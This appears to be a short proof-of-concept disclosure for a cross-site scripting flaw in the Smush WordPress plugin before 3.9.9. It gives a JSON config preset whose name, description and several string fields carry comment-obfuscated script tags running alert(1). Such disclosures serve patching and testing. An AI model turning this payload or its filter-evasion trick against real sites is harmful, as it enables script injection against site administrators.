Smush < 3.9.9 - Admin+ Reflected Cross-Site Scripting

Upload the following config preset via Smush > Settings > Configs (/wp-admin/admin.php?page=smush-settings&view=configs)

{
  "id": 1645860821240,
  "name": " <script /**/>/**/alert(1)/**/</script /**/",
  "description": "\n<script /**/>/**/alert(1)/**/</script /**/\n",
  "config": {
    "configs": {
      "settings": {
        "auto": true,
        "lossy": false,
        "strip_exif": true,
        "resize": false,
        "detection": false,
        "original": false,
        "backup": false,
        "no_scale": false,
        "png_to_jpg": false,
        "nextgen": false,
        "s3": false,
        "gutenberg": false,
        "js_builder": false,
        "cdn": false,
        "usage": false,
        "accessible_colors": false,
        "keep_data": true,
        "lazy_load": false,
        "webp_mod": false
      }
    },
    "strings": {
      "bulk_smush": [
        "Automatic compression - Active\nSuper-Smush - Inactive\nMetadata - Active\nImage Resizing - Inactive\nUploaded Images - Inactive\nBackup Uploaded Images - Inactive\nPNG to JPEG Conversion - Inactive\nDisable Scaled Images - Inactive"
      ],
      "lazy_load": [
        "<script /**/>/**/alert(1)/**/</script /**/"
      ],
      "cdn": [
        "<script /**/>/**/alert(1)/**/</script /**/"
      ],
      "webp_mod": [
        "<script /**/>/**/alert(1)/**/</script /**/"
      ],
      "integrations": [
        "<script /**/>/**/alert(1)/**/</script /**/"
      ],
      "tools": [
        "Image Resize Detection - Inactive"
      ],
      "settings": [
        "Color Accessibility - Inactive\nUsage Tracking - Inactive\nKeep Data On Uninstall - Active"
      ]
    }
  },
  "plugin": "912164"
}